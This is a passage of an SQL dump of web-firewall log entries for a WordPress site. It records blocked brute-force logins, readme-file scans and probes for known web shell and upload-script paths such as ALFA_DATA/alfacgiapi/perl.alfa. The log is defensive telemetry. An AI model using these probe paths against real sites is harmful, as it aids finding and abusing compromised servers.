User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhbGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134445,0.000000,1700141349.568639,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134444,0.000000,1700140663.405628,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134402,1700133368.302373,1700133368.293500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/options.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134403,1700133362.127902,1700133362.117300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/about.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134424,1700136289.252093,1700136289.243400,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134404,1700133356.756245,1700133356.742200,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134453,0.000000,1700143984.919514,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134454,0.000000,1700144650.889993,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134448,0.000000,1700142675.327527,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134449,1700142945.201492,1700142945.189900,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ultimate-member/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134405,1700133350.926944,1700133350.918200,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/ms.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134406,1700133346.078184,1700133346.069400,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134407,1700133340.685105,1700133340.675000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134423,1700136289.308243,1700136289.299600,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134408,1700133334.342672,1700133334.333700,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134421,0.000000,1700136086.219500,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134422,1700136289.396155,1700136289.384900,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(134420,0.000000,1700135457.106830,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134409,1700133330.196312,1700133330.182200,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134410,1700133324.184365,1700133324.175500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134411,1700133320.358113,1700133320.346600,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134419,1700134953.173957,1700134953.166300,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134412,1700133315.714420,1700133315.704100,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/classic-editor/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbGFzc2ljLWVkaXRvci93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134455,1700145264.441814,1700145264.432300,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134413,1700133311.729514,1700133311.720700,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134414,1700133306.954658,1700133306.945700,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134416,0.000000,1700134158.312751,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134417,0.000000,1700134809.319227,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134418,1700134953.174785,1700134953.166300,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134415,0.000000,1700133509.635408,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134437,1700138276.116225,1700138276.092800,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/admin/plugins/jquery_uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluL3BsdWdpbnMvanF1ZXJ5X3VwbG9hZGVyL3NlcnZlci9waHAvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134438,0.000000,1700138654.222184,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134439,0.000000,1700139322.564986,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134440,1700139404.144473,1700139404.090200,0x00000000000000000000FFFF74CAC6E1,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','http://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134428,1700136289.117853,1700136289.108400,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134429,1700136289.034375,1700136289.012500,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(134442,1700140471.182990,1700140471.175100,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/mstore-api/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134441,0.000000,1700139993.785687,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134436,1700138254.023903,1700138254.016200,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-post-author/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134430,1700136543.643918,1700136543.638600,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ht-mega-for-elementor/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log 